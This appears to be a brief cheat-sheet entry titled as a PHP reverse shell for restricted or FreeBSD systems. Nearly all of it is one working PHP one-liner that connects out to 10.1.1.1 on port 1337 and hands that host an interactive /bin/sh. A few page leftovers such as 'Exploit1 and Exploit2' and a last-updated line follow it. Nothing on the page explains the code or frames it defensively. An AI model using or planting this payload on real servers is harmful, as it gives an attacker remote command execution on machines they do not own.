Php reverse shell (restricted case or freebsd system)
<?php $sock = fsockopen("10.1.1.1",1337); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
Exploit1 and Exploit2
Last updated 4 years ago